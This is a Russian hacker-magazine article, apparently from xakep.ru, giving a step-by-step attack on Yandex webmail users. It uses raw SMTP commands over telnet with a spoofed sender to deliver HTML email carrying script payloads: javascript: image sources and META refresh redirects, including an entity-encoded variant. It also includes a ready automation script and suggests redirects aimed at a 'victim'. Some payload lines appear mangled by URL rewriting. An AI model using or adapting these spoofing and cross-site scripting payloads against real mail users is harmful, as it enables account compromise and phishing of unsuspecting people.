Дарова, любители побаловаться чужим мылом. На этот раз мы покопаемся на
YANDEX.RU... Катят все способы, что и на MAIL.RU (см. прошлую
статью), но не будем повторятся, а возьмемся за дело по новому. 

Какой прекрасный сервак! На этот раз нашим орудием станет телнет, надеюсь ты с
ним знаком 🙂 Идея такова: мы отсылаем письмо без аттача,
с измененным полем Content-Type в сообщении, средствами SMTP протокола. Итак, запускаем telnet,
набиваем следующее: 

open smtp.yandex.ru 25 
helo my_enemy 
mail from: <digitalscream@userline.ru> 
rcpt to: <i_need_this_mail@yandex.ru> 
data 

Вместо i_need_this_mail@yandex.ru пропишешь нужное мыло.
А теперь и сама замена типа документа (точку надо ввести при завершении ввода тела документа):

Mime-Version: 1.0 
Content-Type: TEXT/HTML; charset=US-ASCII 
Subject: Message Possible virus infected 🙂 

После чего сама мессага сама станет хтмл'ом. А значит можем прописать скрипты.
Тут все намного проще и ты можешь вставить в
письмо типичные конструкции. Я выбрал: 

<IMG src="https://xakep.ru/wp-content/uploads/post/15653/javascript:java_script"> 

Значит продолжаем вводить тело письма: 

<IMG src="https://xakep.ru/wp-content/uploads/post/15653/javascript:alert('I'm JavaScript!');"> 

И наконец: 

quit 

Но вместо выскакивающего окна ты можешь накодить редирект.
Но так сложилось, что в нашей жизни самое главное автоматизация, ведь нервы
сдают после n-ой ошибки. И тем более, если ты сделаешь ошибку в письме своей
жертве, то твои шансы падают к нулю. Я советую использовать
какие-нибудь программы автоматизации. Я использовал
Telnet Script Executor, она старенькая, еще под ДОС, но
надежная 🙂 Ее скрипт в данном случае бедет выглядеть так: 

open smtp.yandex.ru 25 
pause 10 
transmit "helo my_enemy^M" 
pause 7 
transmit "mail from: <digitalscream@userline.ru>^M" 
pause 10 
transmit "rcpt to: <i_need_this_mail@yandex.ru>^M" 
pause 7 
transmit "data^M" 
pause 10 
transmit "Mime-Version: 1.0^M" 
pause 2 
transmit "Content-Type: TEXT/HTML; charset=US-ASCII^M" 
pause 2 
transmit "Subject: Message Possible virus infected :-)^M" 
pause 2 
transmit "<IMG src="https://xakep.ru/wp-content/uploads/post/15653/javascript:alert('I'm JavaScript!');">^M" 
pause 2 
transmit ".^M" 
pause 10 
close 

Сохраняем это дело в файл, например yandex_fuck.dat, а потом запускаем: 

TSE -d<yandex_fuck.dat 

Но никто не мешает тебе написать свою прогу, мне по крайней мере хватило этой. Вот еще один интересный способ прописать яву, нашел случайно методом научного
тыка: 

<META HTTP-EQUIV="Refresh" content ="4; URL=javascript:alert('hello')"> 

или тоже самое используя юникод: 

<META HTTP-EQUIV="Refresh" content ="4;URL=&#74ava&#83cript:alert('hello')"> 

Ну вот на сегодня хватит, по кифирчику и спать :)) 

P.S.: Достали просить сломать чье-то мыло! Я этим не занимаюсь... Я... я пошел
спать 🙂

Check Also

Уязвимость в Instagram позволяла захватить любой аккаунт за считанные минуты

Независимый исследователь получил 30 000 долларов за обнаруженную в Instagram уязвимость.

Оставить мнение